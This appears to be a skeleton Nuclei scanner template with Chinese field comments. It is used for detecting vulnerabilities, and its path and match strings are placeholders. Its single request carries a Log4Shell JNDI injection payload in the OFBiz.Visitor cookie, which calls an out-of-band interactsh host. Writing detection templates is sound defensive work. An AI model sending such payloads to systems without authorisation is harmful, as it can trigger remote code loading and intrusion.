1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| id: base info: name: base author: msk description: 描述漏洞基本情况 severity: info 漏洞等级 reference: https://www.exploit-db.com/ghdb/6814 漏洞来源 tags: detect 标签 metadata: veified: true fofa-query: fofa语法 hunter-query: 鹰图语法
http: - raw: - | GET /xxxx/xxx HTTP/1.1 Host: {{Hostname}} Connection: keep-alive Cookie: OFBiz.Visitor=${jndi:ldap://{{interactsh-url}}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 user-client: 1
matchers: - type: dsl dsl: - 'status_code==200 && contains_all(body,"xxx1","xxx2")'
|